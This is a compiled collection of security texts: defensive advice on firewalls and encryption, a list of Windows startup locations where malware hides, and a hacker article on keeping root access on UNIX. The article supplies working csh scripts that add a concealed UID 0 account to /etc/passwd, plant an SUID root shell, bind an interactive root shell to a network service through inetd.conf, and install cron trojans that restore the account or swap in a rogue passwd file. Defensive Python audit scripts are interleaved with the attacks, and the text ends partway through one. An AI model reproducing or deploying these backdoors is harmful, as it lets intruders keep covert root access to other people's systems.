authentication procedures have been completed. Even the strongest
authentication (e.g., one-time passwords) are irrelevant because the attack
occurs after the user successfully logs in. (This is another way that your
systems can be compromised from any system that your users can log in from.)

This sort of attack has always been possible, but is easier to do and harder
to detect with the new tools. Various forms of hijacking--from the
completely unsubtle method of waiting for someone to get up for a cup of
coffee without locking their screen, to the devious exploitation of window
systems--have long been the most popular attacks at universities and other
places where people may legitimately have access and yet simultaneously be
hackers. In the past, these attacks have mostly been aimed at users at the
site where the attacks were taking place. The new attacks are aimed at
getting from a compromised system to an otherwise uncompromisable system
across the Internet.

How can you prevent this attack? Once intruders have root access, you can't.
So keep them out to begin with.

Security Solutions

Getting discouraged about connecting to the Internet or doing any real work
on it? Don't be. There are ways to protect your system against the threats
we've described.

There isn't a magic Internet security bullet. The best security solution
isn't a simple solution, but a collection of strategies and techniques. Your
own site's security philosophy, the characteristics of your users, the type
of data you're protecting, and your budget all help determine the right
approach for you. Here are some suggestions.

Enforce Good Host Security

With host security, you enforce the security of every machine at your site
separately, and you make every effort to learn about, and plug, any security
holes that your particular operating system presents. Although host security
isn't a complete solution to Internet risks--there are simply too many
machines, vendors, and operating systems to be sure that you've successfully
been able to secure them all--you need to make sure that every system on
your local network is as secure as you can make it. Systems exposed directly
to Internet traffic need especially strong host security.

In Practical UNIX Security, Simson Garfinkel and Gene Spafford offer
hundreds of specific suggestions for host security and also discuss a wide
range of network security problems and solutions. This book has become the
classic security reference for UNIX users and system administrators.

Encryption of Files and Email

If you use good encryption, then even if an intruder gets access to your
files and messages, he won't be able to make sense of them. There are many
types of encryption programs. Make sure to use one that uses a strong
cryptographic algorithm. Although it's been around a long time, the Data
Encryption Standard (DES) is still a pretty sound private key encryption
algorithm, particularly if you use a variant, like Triple-DES. IDEA, RC2,
and RC4 are other good private key algorithms. The RSA algorithm is the
premier public key algorithm. It's a part of Lotus Notes, Novell NetWare,
and hundreds of other products. Diffie-Hellman and Merkle-Hellman are other
good public key algorithms.

PGP is a program that implements the RSA algorithm and is freely available
on the Net (for noncommercial use within the United States). In PGP: Pretty
Good Privacy, Simson Garfinkel describes how to use PGP to encrypt files and
email and how to "sign" your email with an unforgeable digital signature,
proving to recipients that your messages were sent by you and weren't
modified during transmission. The book also contains a fascinating,
behind-the-scenes look at the development of Phil Zimmermann's controversial
program and the issues surrounding privacy, the export of encryption
programs, and cryptography patents.

Use Firewalls

A firewall restricts access from your internal network to the Internet--and
vice versa. A firewall may also be used to separate two or more parts of
your local network (for example, protecting finance from R&D).

The dictionary definition of "firewall" is: "A fireproof wall used as a
barrier to prevent the spread of a fire." A fire may damage, or even
destroy, one section of a building, but a firewall may keep that fire from
spreading to other sections of the building; at the very least, it may slow
down the spread until the fire can be brought under control.

On computer networks, firewalls serve an analogous purpose. A security
problem somewhere on a network--for example, eavesdropping, a major
break-in, or a worm program--may do a great deal of damage to one portion of
the network. But if a firewall is in place, it can isolate what's behind it
from the security problem. Without firewalls network security problems can
rage out of control, dragging more and more systems down. Once one system on
a network has been compromised, it's often trivial to compromise the others.
Shared system resources, homogeneous services, and trust policies may all
contribute to the spread of a security problem from one system to another.

Think of a firewall as a checkpoint; all traffic is stopped and checked at
this point--usually, at the perimeter of your internal network, where you
connect to the Internet (see the figure above). Your own site's security
policy determines what happens at the checkpoint. Some requests (e.g.,
requests for email service) might pass right through. Others (e.g., requests
for potentially dangerous service like NFS or NIS) might be turned away.
Still others (e.g., requests for FTP file transfers) might be routed to
proxy services, which satisfy the requests without directly exposing
internal systems.

If your site is connected to the Internet, you may want to check out our
forthcoming book, Internet Security Firewalls, by D. Brent Chapman and
Elizabeth D. Zwicky. It contains the details of various firewall approaches
and architectures, how you can build packet filtering and proxying solutions
at your site, and how to configure Internet services to work with a
firewall.

Use Secure Procedures

Purely technical solutions go only so far. Just as there is a human element
to committing computer crimes, there is a human element to preventing them.
Be smart about prevention, and make sure your organization enforces good
security procedures in everything they do. Physical security (e.g., using
access cards for entry, protecting network cabling, etc.), personnel
security (e.g., removing the accounts of people who leave your
organization), and operational security (e.g., varying the schedules for
changing passwords, checking log files, etc.) are less technical, but
nevertheless important, parts of Internet security.

Two books provide valuable information on understanding and establishing
security at your site.

Computer Security Basics, by Deborah Russell and G. T. Gangemi, is the first
book to read if you want to learn what computer security is all about. It
contains the basics of access control, encryption, trusted systems, and
physical security, as well as a history of computer security developments,
U.S. Government security programs (such as the "Orange Book"), and a
complete glossary and resource summary.

Computer Crime: A Crimefighter's Handbook, by David Icove, Karl Seger, and
William VonStorch, is aimed particularly at those who need to investigate
computer crimes--law enforcement, managers, and others. It describes
targets, criminals, methods, and security measures you can take to prevent
them. It also details the way to detect, investigate, and prosecute computer
crimes, and it includes the complete text of all computer crime laws, both
federal and state.

president of SAGE (the System Administrator's Guild). She has been
involuntarily involved in Internet security since before the Worm.

Places that viruses and trojans hide on start up

By ShaolinTiger

The following article was written by ShaolinTiger, Administrator of: http://www.security-forums.com/

1. START-UP FOLDER.

Windows opens every item in the Start Menu's Start Up folder. This folder is prominent in the Programs folder of the Start Menu.

Notice that I did not say that Windows "runs" every program that is represented in the Start Up folder. I said it "opens every item." There's an important difference.

Programs represented in the Start Up folder will run, of course. But you can have shortcuts in the Start Up folder that represent documents, not programs.

For example, if you put a Microsoft Word document in the Start Up folder, Word will run and automatically open that document at bootup; if you put a WAV file there, your audio software will play the music at bootup, and if you put a Web-page Favourites there, Internet Explorer (or your own choice of a browser) will run and open that Web page for you when the computer starts up. (The examples cited here could just as easily be shortcuts to a WAV file or a Word document, and so on.)

2. REGISTRY.

Windows executes all instructions in the "Run" section of the Windows Registry. Items in the "Run" section (and in other parts of the Registry listed below) can be programs or files that programs open (documents), as explained in No. 1 above.

3. REGISTRY.

Windows executes all instructions in the "RunServices" section of the Registry.

4. REGISTRY.

Windows executes all instructions in the "RunOnce" part of the Registry.

5. REGISTRY.

Windows executes instructions in the "RunServicesOnce" section of the Registry. (Windows uses the two "RunOnce" sections to run programs a single time only, usually on the next bootup after a program installation.)

6. REGISTRY.

Windows executes instructions in the HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %* section of the Registry. Any command embedded here will open when any exe file is executed.

Other possibles:

[HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] ="\"%1\" %*"

If keys don't have the "\"%1\" %*" value as shown, and are changed to something like "\"somefilename.exe %1\" %*" then they are automatically invoking the specified file.
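The comparison in the previous paragraph can be run mechanically over a registry export. The following Python is an added example for this page (not ShaolinTiger's code): it parses text in the Registry Editor .reg export format, compares the default value of each executable file type's shell\open\command key with the expected "%1" %*, and lists every entry under a Run, RunOnce, RunServices or RunServicesOnce key as in items 2 to 5 above. The export text is constructed; the hijacked comfile handler and the loader.exe and upd.exe paths in it are invented to exercise the checks. The htafile handler is left out of the strict comparison because its normal default invokes mshta.exe rather than bare "%1" %*.

```python
"""Audit a Windows registry export (.reg text) for hijacked file-type handlers
and list autorun entries. Added example for this page, not ShaolinTiger's code."""
import re

# Default open command expected for the executable file types named in the article.
EXPECTED_OPEN_COMMAND = '"%1" %*'
# htafile is excluded: its normal default runs mshta.exe "%1" %*, so a strict
# comparison with "%1" %* would always fire.
HANDLER_TYPES = {"exefile", "comfile", "batfile", "piffile"}
AUTORUN_LEAVES = {"run", "runonce", "runservices", "runservicesonce"}

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def unescape(s: str) -> str:
    """Strip the quotes of a REG_SZ literal and undo backslash escapes."""
    if len(s) >= 2 and s[0] == '"' and s[-1] == '"':
        s = s[1:-1]
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: data}}; the default value is named '@'."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.startswith(";") or line == "REGEDIT4"
                or line.startswith("Windows Registry Editor")):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "@" if m.group(1) == "@" else unescape(m.group(1))
            keys[current][name] = unescape(m.group(2))
    return keys


def audit_handlers(keys: dict) -> list:
    """Report (file type, command) where an executable handler's default differs
    from "%1" %*; such a handler runs the substituted program on every launch."""
    findings = []
    for path, values in keys.items():
        parts = path.lower().split("\\")
        if len(parts) < 4 or parts[-3:] != ["shell", "open", "command"]:
            continue
        ftype = parts[-4]
        if ftype in HANDLER_TYPES and values.get("@", "") != EXPECTED_OPEN_COMMAND:
            findings.append((ftype, values.get("@", "")))
    return findings


def list_autoruns(keys: dict) -> list:
    """Return (key, value name, command) for every entry under a Run-style key."""
    entries = []
    for path, values in keys.items():
        if path.lower().rsplit("\\", 1)[-1] in AUTORUN_LEAVES:
            entries.extend((path, name, data) for name, data in values.items() if name != "@")
    return entries


# Constructed export: one intact handler, one hijacked handler (loader.exe is
# invented), and two Run entries (upd.exe is invented).
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"

[HKEY_CLASSES_ROOT\comfile\shell\open\command]
@="\"C:\\WINDOWS\\System\\loader.exe\" \"%1\" %*"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"update"="C:\\WINDOWS\\System\\upd.exe"
"""

if __name__ == "__main__":
    parsed = parse_reg_export(SAMPLE_EXPORT)
    for ftype, cmd in audit_handlers(parsed):
        print(f"hijacked {ftype} handler: {cmd}")
    for key, name, data in list_autoruns(parsed):
        print(f"autorun {key} [{name}] = {data}")
```

Exporting the HKEY_CLASSES_ROOT and CurrentVersion keys from a known-clean machine and diffing the parsed dictionaries against a suspect one is the simplest way to use this; the handler check alone catches the "somefilename.exe %1" substitution the article describes, while the autorun listing still has to be read by a person.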

7. BATCH FILE.

Windows executes all instructions in the Winstart batch file, located in the Windows folder. (This file is unknown to nearly all Windows users and most Windows experts, and might not exist on your system. You can easily create it, however. Note that some versions of Windows call the Windows folder the "WinNT" folder.) The full filename is WINSTART.BAT.

8. INITIALIZATION FILE.

Windows executes instructions in the "RUN=" line in the WIN.INI file, located in the Windows (or WinNT) folder.

9. INITIALIZATION FILE.

Windows executes instructions in the "LOAD=" line in the WIN.INI file, located in the Windows (or WinNT) folder.

It also runs things in shell= in System.ini or c:\windows\system.ini:

[boot]
shell=explorer.exe C:\windows\filename

The file name following explorer.exe will start whenever Windows starts.

As with Win.ini, file names might be preceded by considerable space on such a line, to reduce the chance that they will be seen. Normally, the full path of the file will be included in this entry. If not, check the \Windows directory.


10. RELAUNCHING.

Windows reruns programs that were running when Windows shut down. Windows cannot do this with most non-Microsoft programs, but it will do it easily with Internet Explorer and with Windows Explorer, the file-and-folder manager built into Windows. If you have Internet Explorer open when you shut Windows down, Windows will reopen IE with the same page open when you boot up again. (If this does not happen on your Windows PC, someone has turned that feature off. Use Tweak UI, the free Microsoft Windows user interface manager, to reactivate "Remember Explorer settings," or whatever it is called in your version of Windows.)

11. TASK SCHEDULER.

Windows executes autorun instructions in the Windows Task Scheduler (or any other scheduler that supplements or replaces the Task Scheduler). The Task Scheduler is an official part of all Windows versions except the first version of Windows 95, but is included in Windows 95 if the Microsoft Plus Pack was installed.

12. SECONDARY INSTRUCTIONS.

Programs that Windows launches at startup are free to launch separate programs on their own. Technically, these are not programs that Windows launches, but they are often indistinguishable from ordinary auto-running programs if they are launched right after their "parent" programs run.

13. C:\EXPLORER.EXE METHOD.

C:\Explorer.exe

Windows loads explorer.exe (typically located in the Windows directory) during the boot process. However, if c:\explorer.exe exists, it will be executed instead of the Windows explorer.exe. If c:\explorer.exe is corrupt, the user will effectively be locked out of their system after they reboot.

If c:\explorer.exe is a trojan, it will be executed. Unlike all other autostart methods, there is no need for any file or registry changes - the file just simply has to be named c:\explorer.exe

14. ADDITIONAL METHODS.

Additional autostart methods. The first two are used by Trojan SubSeven 2.2.

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\explorer\Usershell folders

Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]
This key specifies that all applications will be executed if ICQNET Detects an Internet Connection.

[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] ="Scrap object"
"NeverShowExt"=""
This key changes your file's specified extension.



Security from a different angle

By Yvette Dubel

Post September 11th has seen a significant surge of interest in data security. It is logical to deduce that Federal, particularly military, information would be under severe scrutiny. Yet, this approach flies in the face of the knowledge brought tragically to bear after the U.S. terrorist attack. Interest in hacker activities, though, is hardly due entirely to this event. There are several lessons to be learned from this portentous impact on the collective psyche. One, the obvious is not the same as the logical. Two, there is priceless value in being able to collect clues and miraculously make the right connections. Three, the importance of knowing one's own weaknesses. And four, community awareness and action can make all the difference in nearly any circumstance. What I see as glaringly conspicuous is that next steps must transcend merely reactionary offensive measures. What exactly does all this mean in regard to IT security? It is not separate from community, and thus the human element. It is, in fact, about them. Therefore, I put forward that this is the critical and largely unaddressed aspect of IT security. Objectification of data will not provide security in and of itself; data is valued because of its relationship to people. Consider the following in light of that statement. What is the most vulnerable and potentially valuable data? You may consider this an introduction to my slant regarding IT security. In future articles I will take this issue into relatively uncharted territory. Your discussion and comments are of course welcomed and encouraged. I look forward to hearing from you on the discussion boards.

System Backdoor Information

By The Infinity Concept Issue II

Ok..... You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight. The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally! After seemingly endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-user privilege you have worked so hard to achieve....?


This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike. From a hacking perspective, it is obvious what good this paper will do you. Admins can likewise benefit from this paper. Ever wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your system?

This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are ways into one.


Beforehand


Know the location of critical system files. This should be obvious (if you can't list any off the top of your head, stop reading now, get a book on UNIX, read it, then come back to me...). Be familiar with passwd file formats (including the general 7-field format, system-specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful when you need to quickly search and edit a large file. If you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program that has a nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...

The permanence of these backdoors will depend completely on the technical savvy of the administrator. The experienced and skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time to come. One major thing to be aware of is the fact that if you can cover your tracks during the initial break-in, no one will be looking for back doors.


The Overt


[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of re-entry. It flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply prepend or append it. Anyone casually examining the passwd file will see this. So, why not stick it in the middle...



#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# daemon9@netcom.com

set linecount = `wc -l /etc/passwd`
cd                                      # Do this at home.
cp /etc/passwd ./temppass               # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1                     # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass         # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd                   # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...



NEVER, EVER, change the root password. The reasons are obvious.



[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somewhere buried deep in the passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second field).
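Seen from the administrator's side, [1] and [2] are both caught by the same check: read the passwd file and look at the UID and password fields of every line, wherever the line sits. The Python below is an added example for this page (not the article's code). It parses passwd-format text and reports any UID 0 account other than the expected ones, any empty password field, duplicate user names and malformed lines. The sample passwd text is constructed; it contains the article's EvilUser line in the middle of the file and a sync account re-enabled as UID 0.

```python
"""Audit passwd-format text for unexpected UID 0 accounts and empty password fields.

Added example for this page; not part of the original article."""

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text: str) -> list:
    """Split passwd lines into dicts; comments and NIS '+'/'-' lines are skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line[0] in "#+-":
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"lineno": lineno, "malformed": line})
            continue
        entry = dict(zip(PASSWD_FIELDS, fields))
        entry["lineno"] = lineno
        entries.append(entry)
    return entries


def audit_passwd(text: str, expected_uid0=("root",)) -> list:
    """Return (lineno, name, problem) tuples. Position in the file is irrelevant:
    an entry buried in the middle is found exactly like one at the end."""
    findings, seen = [], set()
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append((e["lineno"], e["malformed"], "wrong number of fields"))
            continue
        name, pw = e["name"], e["passwd"]
        if name in seen:
            findings.append((e["lineno"], name, "duplicate user name"))
        seen.add(name)
        if not e["uid"].isdigit():
            findings.append((e["lineno"], name, "non-numeric UID"))
            continue
        # '*' or '!' in the password field means the account is locked; a locked
        # UID 0 entry is still reported because re-enabling it is a one-character edit.
        locked = pw.startswith(("*", "!"))
        if int(e["uid"]) == 0 and name not in expected_uid0:
            findings.append((e["lineno"], name,
                             "UID 0 account not in expected list" + (" (locked)" if locked else "")))
        if pw == "":
            findings.append((e["lineno"], name, "empty password field"))
    return findings


# Constructed sample: the article's EvilUser line sits in the middle, and the
# disabled sync account has been re-enabled as UID 0 (method [2]).
SAMPLE_PASSWD = """\
root:x:0:0:root:/:/bin/csh
daemon:*:1:1::/:/bin/sh
bin:*:2:2::/bin:/bin/sh
EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh
sync:x:0:1::/:/bin/sync
alice:x:1001:100:Alice:/home/alice:/bin/sh
nobody:*:65534:65534::/:/bin/sh
"""

if __name__ == "__main__":
    for lineno, name, problem in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {name}: {problem}")
```

Running this from cron against /etc/passwd (and the shadow file, where the password field actually lives) and mailing any non-empty output is a cheap way to make the "stick it in the middle" trick pointless.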



[3] Leave an SUID root shell in /tmp.



#!/bin/sh
# Everyone's favorite...

cp /bin/csh /tmp/.evilnaughtyshell      # Don't name it that...
chmod 4755 /tmp/.evilnaughtyshell



Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may notice... (but, hey, this *is* the overt section...). I will not detail the changes necessary because they can be quite system specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.


The Veiled


[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical lines look like this:



(1)    (2)     (3)  (4)     (5)   (6)              (7)
ftp    stream  tcp  nowait  root  /usr/etc/ftpd    ftpd
talk   dgram   udp  wait    root  /usr/etc/ntalkd  ntalkd



Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect. TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP or UDP. Field (4) specifies whether the daemon is iterative or concurrent. A 'wait' flag indicates that the server will process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more importantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally. This is done with an 'internal' flag in fields (6) and (7).

So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd file, etc...

For the insinuation-impaired, try this:



Open the /etc/inetd.conf in an available editor. Find the line that reads:

daytime stream tcp nowait root internal

and change it to:

daytime stream tcp nowait /bin/sh sh -i

You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and restart the process (kill -9 the running inetd, then start /usr/sbin/inetd or /usr/etc/inetd), which will interrupt ALL network connections (so it is a good idea to do this off peak hours).



[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One simple solution is to set up a shell that runs similar to the above backdoor. You need to make sure the entry appears in /etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:

(1)    (2)/(3)  (4)
smtp   25/tcp   mail

Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name associated with the service. For instance, add this line to /etc/services:

evil 22/tcp evil

and this line to /etc/inetd.conf:

evil stream tcp nowait /bin/sh sh -i

Restart inetd as before.

Note: Potentially, these are VERY powerful backdoors. They not only offer local re-entry from any account on the system, they offer re-entry from *any* account on *any* computer on the Internet.
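The inetd.conf and /etc/services formats described in [4] and [5] are simple enough that an administrator can check them mechanically rather than by eye. The following Python is an added example for this page (not the article's code). It parses both files and flags entries whose service name has no matching entry in /etc/services, whose user field looks like a path (the fields have been shifted, as in both of the article's edits), whose server program is a shell or is started with -i, whose server lives outside the directories in TRUSTED_DIRS, or whose port is registered under more than one service name. Both sample files are constructed; they contain the article's daytime and evil entries beside normal ones, and TRUSTED_DIRS is an assumption about where this site keeps its servers.

```python
"""Cross-check inetd.conf against /etc/services and flag suspicious server entries.

Added example for this page; not the article's code."""
import os.path

SHELLS = {"sh", "csh", "tcsh", "ksh", "bash"}
# Where this site expects inetd-started servers to live (constructed for the example).
TRUSTED_DIRS = ("/usr/etc/", "/usr/sbin/", "/usr/libexec/", "/usr/lib/")


def parse_services(text: str):
    """Return (by_name, by_port): name or alias -> {(port, proto)}, and
    (port, proto) -> {primary names}."""
    by_name, by_port = {}, {}
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) < 2 or "/" not in parts[1]:
            continue
        port, proto = parts[1].split("/", 1)
        key = (int(port), proto)
        by_port.setdefault(key, set()).add(parts[0])
        for name in parts[:1] + parts[2:]:
            by_name.setdefault(name, set()).add(key)
    return by_name, by_port


def parse_inetd_conf(text: str) -> list:
    """Split inetd.conf lines into the seven fields described in the article."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        f = raw.split("#", 1)[0].split()
        if not f:
            continue
        if len(f) < 6:
            entries.append({"lineno": lineno, "malformed": raw})
            continue
        entries.append({"lineno": lineno, "service": f[0], "socket": f[1], "proto": f[2],
                        "wait": f[3], "user": f[4], "server": f[5], "args": f[6:]})
    return entries


def audit_inetd(conf_text: str, services_text: str) -> list:
    """Return (lineno, service, problem) tuples for entries worth a second look."""
    by_name, by_port = parse_services(services_text)
    findings = []
    for e in parse_inetd_conf(conf_text):
        if "malformed" in e:
            findings.append((e["lineno"], "?", "fewer than six fields"))
            continue
        ln, svc = e["lineno"], e["service"]
        keys = {k for k in by_name.get(svc, set()) if k[1] == e["proto"]}
        if not keys:
            findings.append((ln, svc, f"no {e['proto']} entry for this service in /etc/services"))
        for key in keys:
            others = sorted(by_port[key] - {svc})
            if others:
                findings.append((ln, svc, f"port {key[0]}/{key[1]} also registered as {others}"))
        if "/" in e["user"]:
            findings.append((ln, svc, f"user field {e['user']!r} is a path; fields are shifted"))
        if e["server"] == "internal":
            continue
        if os.path.basename(e["server"]) in SHELLS or "-i" in e["args"]:
            findings.append((ln, svc, "server is a shell or is started interactively"))
        if not e["server"].startswith(TRUSTED_DIRS):
            findings.append((ln, svc, f"server {e['server']!r} outside trusted directories"))
    return findings


# Constructed samples. The last /etc/services line and the last two inetd.conf
# lines are the article's additions; the rest are ordinary entries.
SAMPLE_SERVICES = """\
echo      7/tcp
echo      7/udp
daytime  13/tcp
daytime  13/udp
ftp      21/tcp
ssh      22/tcp
smtp     25/tcp   mail
talk    517/udp
ntalk   518/udp
evil     22/tcp   evil
"""

SAMPLE_INETD_CONF = """\
ftp     stream  tcp  nowait  root  /usr/etc/ftpd    ftpd
talk    dgram   udp  wait    root  /usr/etc/ntalkd  ntalkd
echo    stream  tcp  nowait  root  internal
daytime stream  tcp  nowait  /bin/sh sh -i
evil    stream  tcp  nowait  /bin/sh sh -i
"""

if __name__ == "__main__":
    for lineno, svc, problem in audit_inetd(SAMPLE_INETD_CONF, SAMPLE_SERVICES):
        print(f"inetd.conf line {lineno} ({svc}): {problem}")
```

The port-sharing check is what exposes the second trick: the attacker's services entry is internally consistent, but 22/tcp is already ssh's, and a port that answers to two names is worth explaining. Comparing both files against a copy kept off the machine catches everything else.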



[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usually located. Here, you have several options. I will list only a few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon. It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove, or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab entry has six fields:

(1)  (2)  (3)  (4)  (5)  (6)
0    0    *    *    1    /usr/bin/updatedb

Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31), month of the year (1-12), day of the week (0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron, simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the /etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your shady intentions). Add this line to /var/spool/crontab/root:

0 0 * * * /usr/bin/trojancode

This is the shell script:

#!/bin/csh
# Is our eviluser still on the system? Let's make sure he is.
# daemon9@netcom.com

set evilflag = (`grep eviluser /etc/passwd`)

if($#evilflag == 0) then                # Is he there?
    set linecount = `wc -l /etc/passwd`
    cd                                  # Do this at home.
    cp /etc/passwd ./temppass           # Safety first.
    @ linecount[1] /= 2
    @ linecount[1] += 1                 # we only want 2 temp files
    split -$linecount[1] ./temppass     # passwd string optional
    echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
    cat ./xab >> ./xaa
    mv ./xaa /etc/passwd
    chmod 644 /etc/passwd               # or whatever it was beforehand
    rm ./xa* ./temppass
    echo Done...
else
endif



[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the /etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!). Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything would be ok. Add this line to root's crontab file:

29 2 * * * /bin/usr/sneakysneaky_passwd

make sure this exists:

#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky

and this is the simple shell script:

#!/bin/csh
# Install trojan /etc/passwd file for one minute
# daemon9@netcom.com

cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.sneaky /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
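An administrator reviewing root's crontab for the entries in [6] and [7] wants two things checked on every line: that the five time fields are well formed, and that the command is one that belongs there. The Python below is an added example for this page (not the article's code). It parses six-field crontab lines, validates the time fields against the ranges given in [6], and flags commands that are absent from a baseline of known cron jobs, whose program lives outside STANDARD_DIRS, or whose path passes through a hidden (dot) component. The baseline, STANDARD_DIRS and the sample crontab are constructed; the sample includes both of the article's trojan entries.

```python
"""Review root's crontab entries: validate time fields and flag unknown commands.

Added example for this page; not the article's code."""
import os.path

# Ranges from the article's description of fields (1)-(5). Vixie cron also
# accepts 7 for Sunday in the day-of-week field, so 0-7 is allowed there.
TIME_FIELDS = (("minute", 0, 59), ("hour", 0, 23), ("day of month", 1, 31),
               ("month", 1, 12), ("day of week", 0, 7))
# Directories this site expects cron commands to come from (constructed).
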